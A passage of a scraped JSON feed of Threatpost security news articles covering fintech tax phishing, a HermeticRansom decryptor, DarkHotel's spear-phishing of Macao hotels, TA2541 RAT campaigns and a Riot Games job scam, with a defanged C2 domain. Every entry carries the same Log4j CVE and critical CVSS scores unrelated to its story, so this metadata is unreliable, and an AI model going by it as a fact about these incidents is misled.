in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.\n\nThe email includes a link to a document \u2013 purportedly associated with the person\u2019s Stash or Public account \u2013 and invites users to use the link to log in to their accounts to access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.\n\n## **Rise in Fintech Threats**\n\nFintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people\u2019s overall time online.\n\nAccording to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 \u2013 a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.\n\nSurprisingly, that\u2019s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. \u201cThat gives hackers a wide range of people to steal credentials from,\u201d he said.\n\nThreat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year\u2019s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.\n\n## **Catching Users Off Guard**\n\nFintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.\n\n\u201cThey may not be expecting tax documents from these apps, inducing them to click,\u201d he wrote in the report. \u201cSince most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber hygiene.\u201d\n\nOn the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.\n\nTo keep networks safe during tax season, Avanan is advising security professionals\n\nto encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company\u2019s IT department if they are unsure if an email is legitimate or not.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:16", "type": "threatpost", "title": "Tax-Season Scammers Spoof Fintechs, Including Stash, Public", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:16", "id": "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "href": "https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T16:58:20", "description": "A free decryptor is out to unlock a ransomware found piggybacking on the HermeticWiper data wiper malware that [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s[ Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) discovered targeting machines at financial, defense, aviation and IT services outfits in Ukraine, [Lithuania](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) and Latvia last week.\n\nThe fact that there was ransomware clinging to the data-wiping malware didn\u2019t surprise cybersecurity experts, of course. It was predicted by Katie Nickels, director of intel at Red Canary, for one: She [tweeted](<https://twitter.com/likethecoins/status/1496590297228357634?cxt=HBwWhMC9ica8-sQpAAAA&cn=ZmxleGlibGVfcmVjcw%3D%3D&refsrc=email>) that there was very likely a \u201cbroader intrusion chain.\u201d\n\n> As you're reading this, note this point: adversaries likely had control of the AD server already. They were already in. There's a broader intrusion chain beyond just the wiper, it just isn't publicly known yet. I'm watching for any details on what happens BEFORE wiper deployment. <https://t.co/59SZTpTlXA>\n> \n> \u2014 Katie Nickels (@likethecoins) [February 23, 2022](<https://twitter.com/likethecoins/status/1496590297228357634?ref_src=twsrc%5Etfw>)\n\nWhat might have been a bit more surprising was the welcome [discovery](<https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/>), made by CrowdStrike\u2019s Intelligence Team earlier this week, that HermeticRansom had a lame encryption process that let the ransomware\u2019s tentacles be untangled.\n\nAvast Threat Labs had [spotted](<https://twitter.com/AvastThreatLabs/status/1496663206634344449>) the new ransomware strain last Thursday, Feb. 24. Avast, which named the new strain HermeticRansom, on Thursday [released](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/>) a free decryptor that incorporated a decryption [script](<https://github.com/CrowdStrike/PartyTicketDecryptor>) CrowdStrike released to GitHub, a user-friendly GUI and a set of instructions on its use.\n\nThe decryptor can be downloaded [here](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/#howto>).\n\n## Crypto Likely Weakened by Coding Errors\n\nHermeticRansom, aka PartyTicket, was [identified](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) at several victimized organizations, among other malware families that included what CrowdStrike called the \u201csophisticated\u201d HermeticWiper, aka DriveSlayer.\n\nRegardless of how sophisticated the wiper malware was, the ransomware that hopped a ride on it had less-than-stellar encryption, with a logic flaw in the encryption process that enabled researchers to break through, CrowdStrike said: \u201cAnalysis of the [PartyTicket/HermeticRansom] ransomware indicates it superficially encrypts files and does not properly initialize the encryption key, making the encrypted file with the associated .encryptedJB extension recoverable.\u201d\n\nAt the time it published its report, CrowdStrike hadn\u2019t traced the ransomware to a known threat actor. It didn\u2019t quite seem like a serious attempt at ransomware, at any rate, researchers said, given the coding errors that made its encryption \u201cbreakable and slow.\u201d\n\nEither the malware author was unfamiliar with writing in Go or rushed its development without thoroughly testing it, analysts surmised.\n\nEither way, it looked to analysts as if extortion wasn\u2019t the primary aim: \u201cThe relative immaturity and political messaging of the ransomware, the deployment timing and the targeting of Ukrainian entities are consistent with its use as an additional payload alongside DriveSlayer activity, rather than as a legitimate ransomware extortion attempt,\u201d they wrote.\n\nBelow is a screen capture of HermeticRansom\u2019s extortion note:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png>)\n\nHermeticRansom ransomware demand note. Source: CrowdStrike Intelligence Team.\n\n## HermeticWiper History\n\n[**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), discovered last week, has been used against hundreds of machines in Ukraine \u2013 attacks that followed distributed denial-of-service (DDoS) attacks launched against Ukraine websites on Feb. 23.\n\nOne of the HermeticWiper malware samples was compiled back on Dec. 28, pointing to the wiper attacks having been [readied](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) two months before Russia\u2019s military assault.\n\nHermeticWiper was only one of an onslaught of cyberattacks and malware that have been unleashed prior to and during the crisis, including the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>), a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of pre-invasion DDoS attacks in mid-February, plus another [campaign](<https://threatpost.com/destructive-wiper-ukraine/177768/>) of wiper attacks targeting Ukraine and aimed at eroding trust in January \u2013 just a few of an ongoing barrage of cyberattacks in the [cyber warzone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T16:56:27", "type": "threatpost", "title": "Free HermeticRansom Ransomware Decryptor Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-04T16:56:27", "id": "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "href": "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.'\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade & Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:44", "description": "Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.\n\nThe group, which researchers have dubbed TA2541, typically sends hundreds of thousands of malicious messages \u2013 nearly always in English \u2013 that ultimately deliver a remote-access trojan (RAT) payload using commodity malware to collect data from victims\u2019 machines and networks, according to [a new report](<https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight>) by Proofpoint released Tuesday. These campaigns have affected hundreds of organizations across the world, with recurring targets in North America, Europe and the Middle East, researchers said.\n\nThough a number of the group\u2019s attacks already have been tracked by various researchers \u2013 including [Microsoft](<https://twitter.com/MsftSecIntel/status/1392219299696152578>), [Mandiant](<https://www.mandiant.com/resources/dissecting-netwire-phishing-campaigns-usage-process-hollowing>), [Cisco Talos](<https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html>), [Morphisec](<https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader>) and others \u2013 since at least 2019, Proofpoint\u2019s latest research shares \u201ccomprehensive details linking public and private data under one threat activity cluster we call TA2541,\u201d researchers wrote.\n\nIndeed, previously reported attacks related to TA2541 include [a two-year spyware campaign](<https://threatpost.com/airline-credential-theft-campaign/174264/>) against the aviation industry using the AsyncRAT called Operation Layover and uncovered by Cisco Talos last September, and a [cyberespionage campaign](<blank>) against aviation targets spreading RevengeRAT or AsyncRAT revealed by Microsoft last May, among others.\n\n## **Five Years and Still Flying High**\n\nProofpoint first started tracking the actor in 2017 when its tactic of choice was to send messages with \u201cmacro-laden Microsoft Word attachments\u201d that downloaded RAT payloads. The group has since tweaked this tactic and now most frequently sends messages with links to cloud services such as Google Drive or OneDrive hosting the payload, according to the report.\n\nHowever, although the approach to how they hide their malicious payload has varied, the group has mostly remained consistent in its choice of targets, lures and the type of payloads it uses, observed Sherrod DeGrippo, vice president of Threat Research & Detection at Proofpoint.\n\n\u201cWhat\u2019s noteworthy about TA2541 is how little they\u2019ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,\u201d she said in an email to Threatpost. \u201cThis group is a persistent threat to targets throughout the transportation, logistics, and travel industries.\u201d\n\nIn terms of which specific RATs are used, attackers tap a variety of low-hanging fruit \u2013 that is, commodity malware that\u2019s available for purchase on criminal forums or available in open-source repositories. Currently, TA2541 prefers to drop AsyncRAT on victims\u2019 machines but also is known to use NetWire, WSH RAT and Parallax, researchers said.\n\nSo far, all of the malware distributed by the group has been aimed at information-gathering purposes and to gain remote control of an infected machine, with researchers acknowledging that they don\u2019t know the threat actor\u2019s \u201cultimate goals and objectives\u201d beyond this initial compromise, they said.\n\n## **Typical Malicious Emails**\n\nA typical malicious message in a TA2541 campaign uses a lure related to some type of logistical or transportation theme related to one of the particular industries it\u2019s targeting, researchers said.\n\n\u201cIn nearly all observed campaigns, TA2541 uses lure themes that include transportation-related terms such as flight, aircraft, fuel, yacht, charter, etc.,\u201d according to the report.\n\nFor example, researchers revealed an email that impersonated an aviation company requesting information on aircraft parts, as well as another that requested info on how to transport a medical patient on a stretcher on an ambulatory flight.\n\nOnce the COVID-19 pandemic hit in March 2020, the group shifted bait tactics slightly and \u2013 like [many other threat actors](<https://threatpost.com/spearphishing-campaign-exploits-covid-19-to-spread-lokibot-infostealer/154432/>) \u2013 adopted [COVID-related lures](<https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/>) consistent with their overall theme of cargo and flight details, researchers noted.\n\n\u201cFor example, they distributed lures associated with cargo shipments of personal protective equipment (PPE) or COVID-19 testing kits,\u201d researchers noted.\n\nHowever, this shift was short-lived, and TA2541 rather quickly returned to its more generic, transportation-related email themes, they added.\n\n## **Current Attack Vector**\n\nIn current campaigns observed by Proofpoint, if victims take the bait, they will usually be directed to click on a Google Drive URL that leads to an obfuscated Visual Basic Script (VBS) file, researchers said.\n\n\u201cIf executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub,\u201d researchers wrote. \u201cThe threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections.\u201d\n\nIn this way, TA2541 collects system information before then downloading the RAT on the host machine, according to the report.\n\nGoogle Drive has been a consistent tool of the threat group, but occasionally TA2541 also will use OneDrive to host the malicious VBS files, researchers said. In late 2021, Proofpoint also observed the group using DiscordApp URLs that link to a compressed file that led to either AgentTesla or Imminent Monitor as an attack vector, researchers said. Indeed, the Discord content delivery network (CDN) has been [an increasingly popular way](<https://threatpost.com/attackers-discord-slack-malware/165295/>) for threat actors to use a legitimate and popular app for nefarious purposes.\n\nOccasionally TA2541 also will use email attachments instead of cloud-based service links, including compressed executables such as RAR attachments with an embedded executable containing URL to CDNs hosting the malware payload, they added.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T14:02:07", "type": "threatpost", "title": "TA2541: APT Has Been Shooting RATs at Aviation for Years", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T14:02:07", "id": "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "href": "https://threatpost.com/ta2541-apt-rats-aviation/178422/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": 